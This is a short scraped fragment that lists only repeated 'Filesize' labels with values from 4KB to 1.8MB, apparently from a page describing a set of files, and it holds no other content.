Filesize
104KB
-
Filesize
1.8MB
-
Filesize
472KB
-
Filesize
272KB
-
Filesize
88KB
-
Filesize
84KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB